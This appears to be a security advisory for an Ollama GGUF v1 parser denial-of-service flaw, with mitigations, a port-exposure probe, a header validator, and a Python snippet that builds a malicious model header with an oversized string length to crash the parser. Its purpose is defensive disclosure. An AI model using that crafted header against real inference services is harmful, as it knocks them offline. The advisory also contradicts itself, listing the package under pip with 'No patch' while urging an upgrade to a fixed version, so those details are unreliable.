CVE-2025-66960: ollama: Input Validation flaw enables exploitation
Severity: HIGH · PoC available · CISA SSVC decision: Track

Ollama's GGUF v1 parser reads attacker-controlled string lengths without validation, letting any network-reachable adversary crash your inference service by serving a malicious model file, with no credentials or prior access needed. If your team runs Ollama in production, CI/CD pipelines, or dev environments that pull external models, patch immediately and restrict model sources to verified registries. Treat all externally sourced GGUF files as untrusted until upgraded.
Risk Assessment
High risk for organizations with Ollama in their AI stack. CVSS 7.5 with no authentication, no user interaction, and low complexity means exploitation requires minimal skill. Impact is availability-only (no data exposure), but inference service crashes disrupt all downstream AI-dependent applications. Highest exposure for teams with Ollama API (port 11434) network-accessible or automated model pull pipelines.
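A quick TCP reachability probe of the default API port can help gauge exposure during an audit. This is a minimal sketch, not part of Ollama's tooling; the `ollama_port_open` helper name and the host list are assumptions to adapt to your inventory.

```python
import socket

def ollama_port_open(host: str, port: int = 11434, timeout: float = 2.0) -> bool:
    """Return True if the given host accepts TCP connections on the
    (default) Ollama API port, i.e. the service may be network-exposed."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Usage sketch: iterate over your host inventory instead of this placeholder.
for host in ("127.0.0.1",):
    print(host, "REACHABLE" if ollama_port_open(host) else "closed/filtered")
```

A reachable port is not proof of vulnerability, but any host answering here deserves the firewall and provenance controls listed below.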
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| ollama | pip | — | No patch |
If you run Ollama from any source, assume you are affected until a patched release ships.
Recommended Action
1. Patch: Upgrade Ollama to the fixed version; check GitHub releases for CVE-2025-66960 resolution.
2. Network isolation: Restrict Ollama API access (default port 11434) to trusted internal IPs via firewall rules; never expose it publicly.
3. Model provenance: Only pull models from verified, hash-validated sources; block untrusted community GGUF files via an allowlist policy.
4. Process supervision: Run Ollama under systemd or supervisord with auto-restart to limit DoS downtime.
5. Detection: Alert on unexpected Ollama process exits or OOM kills in system and application logs.
6. Inventory: Audit all Ollama deployments across dev, staging, and prod; shadow-IT instances are the highest risk.
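The model-provenance step can be backed by a pre-pull sanity check that rejects files whose metadata declares a string longer than the file itself, the exact pattern behind this DoS. The sketch below assumes the GGUF v1 layout (magic `GGUF`, then uint32 version, tensor count, and metadata KV count, with strings stored as a uint32 length followed by bytes); `gguf_v1_header_sane` is an illustrative helper, not Ollama's actual validation code.

```python
import struct

GGUF_MAGIC = b"GGUF"

def gguf_v1_header_sane(path: str) -> bool:
    """Reject GGUF v1 files whose first metadata key declares a string
    length that cannot possibly fit in the file."""
    with open(path, "rb") as f:
        data = f.read()
    if len(data) < 16 or data[:4] != GGUF_MAGIC:
        return False
    version, tensor_count, kv_count = struct.unpack_from("<III", data, 4)
    if version != 1:
        return True  # only the v1 string path is sketched here
    if kv_count == 0:
        return True
    offset = 16
    if offset + 4 > len(data):
        return False
    (key_len,) = struct.unpack_from("<I", data, offset)
    # A declared length larger than the remaining bytes is the attack signature.
    return offset + 4 + key_len <= len(data)
```

A full validator would walk every key/value pair the same way; the point is to bound every declared length against the file size before allocating or reading.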
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-66960?
Ollama's GGUF v1 parser reads attacker-controlled string lengths without validation, letting any network-reachable adversary crash your inference service by serving a malicious model file — no credentials or prior access needed. If your team runs Ollama in production, CI/CD pipelines, or dev environments that pull external models, patch immediately and restrict model sources to verified registries. Treat all externally-sourced GGUF files as untrusted until upgraded.
Is CVE-2025-66960 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-66960, increasing the risk of exploitation.
How to fix CVE-2025-66960?
1. Patch: Upgrade Ollama to the fixed version; check GitHub releases for CVE-2025-66960 resolution.
2. Network isolation: Restrict Ollama API access (default port 11434) to trusted internal IPs via firewall rules; never expose it publicly.
3. Model provenance: Only pull models from verified, hash-validated sources; block untrusted community GGUF files via an allowlist policy.
4. Process supervision: Run Ollama under systemd or supervisord with auto-restart to limit DoS downtime.
5. Detection: Alert on unexpected Ollama process exits or OOM kills in system and application logs.
6. Inventory: Audit all Ollama deployments across dev, staging, and prod; shadow-IT instances are the highest risk.
What systems are affected by CVE-2025-66960?
This vulnerability affects the following AI/ML architecture patterns: model serving, local LLM inference, self-hosted LLM deployments, MLOps pipelines, AI development environments.
What is the CVSS score for CVE-2025-66960?
CVE-2025-66960 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.29%.
Technical Details
NVD Description
An issue in ollama v0.12.10 allows a remote attacker to cause a denial of service via fs/ggml/gguf.go: the function readGGUFV1String reads a string length from untrusted GGUF metadata without validating it.
Exploitation Scenario
An adversary crafts a GGUF v1 model file with a maliciously oversized string length value in the metadata header (e.g., 0xFFFFFFFF bytes). They publish it to a public model hub or host it on an attacker-controlled server. When an engineer runs 'ollama pull attacker/malicious-model' or an automated MLOps pipeline fetches and evaluates new models from external sources, Ollama's readGGUFV1String in fs/ggml/gguf.go reads the attacker-controlled length and attempts to allocate or read that many bytes, triggering a Go panic. The Ollama service crashes immediately, dropping all active inference sessions. In environments with fully automated model evaluation pipelines, this attack can be triggered repeatedly without any human interaction.
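The malicious header described above can be sketched concretely. This builds only the 20-byte header with an oversized declared key length; it assumes the GGUF v1 layout (magic `GGUF`, uint32 version, uint32 tensor count, uint32 metadata KV count, then a uint32 string length), and `build_malicious_gguf_v1` is an illustrative name, not real exploit tooling.

```python
import struct

def build_malicious_gguf_v1() -> bytes:
    """Illustrative only: a GGUF v1 header whose single metadata key
    declares an absurd string length (0xFFFFFFFF). A parser that trusts
    this length will try to read ~4 GiB that never arrives and panic."""
    header = b"GGUF"                         # magic
    header += struct.pack("<I", 1)           # version 1
    header += struct.pack("<I", 0)           # tensor count
    header += struct.pack("<I", 1)           # metadata KV count
    header += struct.pack("<I", 0xFFFFFFFF)  # key string length: oversized
    return header  # file ends here; the declared 4 GiB of key bytes never follow
```

The mismatch between the declared length and the actual file size is exactly what the pre-pull check in the recommendations section looks for.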
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References
- github.com/ollama/ollama/issues/9820 (vendor issue; exploit details)
- zero.shotlearni.ng/blog/cve-2025-66960guf-v1-string-length-cause-panic-in-readggufv1string/ (third-party exploit write-up)
Related Vulnerabilities
- CVE-2025-63389 (9.8) ollama: Missing Auth allows unauthenticated access (same package: ollama)
- CVE-2026-44007 (9.1) vm2: sandbox escape via nesting:true enables RCE
- CVE-2024-37032 (8.8) Ollama: path traversal enables RCE via model blob API (same package: ollama)
- CVE-2024-39720 (8.2) Ollama: OOB read in GGUF parser enables remote DoS (same package: ollama)
- CVE-2024-39719 (7.5) Ollama: file existence oracle via api/create errors (same package: ollama)